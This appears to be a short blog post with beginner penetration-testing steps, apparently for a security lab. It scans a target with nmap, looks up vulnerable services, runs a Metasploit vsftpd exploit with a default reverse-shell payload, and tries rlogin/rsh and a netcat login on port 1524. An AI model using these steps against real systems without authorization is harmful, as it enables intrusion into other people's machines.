1. Use backtrack, because it has been installed many attacking tools including Metasploit
2. Use nmap to scan a target host, and identify what services are running
$ nmap -A -T4 www.hostIP.com
-A: Enable OS detection, version detection, script scanning, and traceroute
-T4 for faster execution
nmap cheatsheet: https://tiw2013.cse.psu.edu/slides/cheat_sheet.pdf
3. Go to securityfocus website, use the service name and version as the keyword, then find out if there is an vulnerability for that service.
securityfocus: http://www.securityfocus.com/vulnerabilities
e.g., vsftpd, irc2
4. Open Metasploit to exploit the vulnerability
$ msfconsole
$ use /unix/vsftpd/exploit-path
$ set rhost target-IP
$ exploit
Metasploit set lhost to current IP and payload to reverse-shell as default.
Additional Tips:
1) try rlogin and rsh commands
$ rlogin -l username Target-IP
$ rsh -l username Target-IP
2) take a look at port 1524. If it is open, try to login with netcat
$nc TargetIP 1524
No comments:
Post a Comment